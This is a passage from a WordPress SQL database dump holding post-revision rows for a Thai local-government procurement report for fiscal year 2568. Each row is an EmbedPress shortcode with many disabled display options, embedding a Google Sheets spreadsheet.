_transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854[/embedpress]','รานการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ.2568','','inherit','closed','closed','','1558-revision-v1','','','2025-07-01 14:27:45','2025-07-01 07:27:45','',1558,'http://pakhaeng.ssk.in.th/?p=1567',0,'revision','',0),
(1568,1,'2025-07-01 14:29:24','2025-07-01 07:29:24','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'800\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854[/embedpress]','รานการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ.2568','','inherit','closed','closed','','1558-revision-v1','','','2025-07-01 14:29:24','2025-07-01 07:29:24','',1558,'http://pakhaeng.ssk.in.th/?p=1568',0,'revision','',0),
(1569,1,'2025-07-01 14:29:25','2025-07-01 07:29:25','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'800\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' 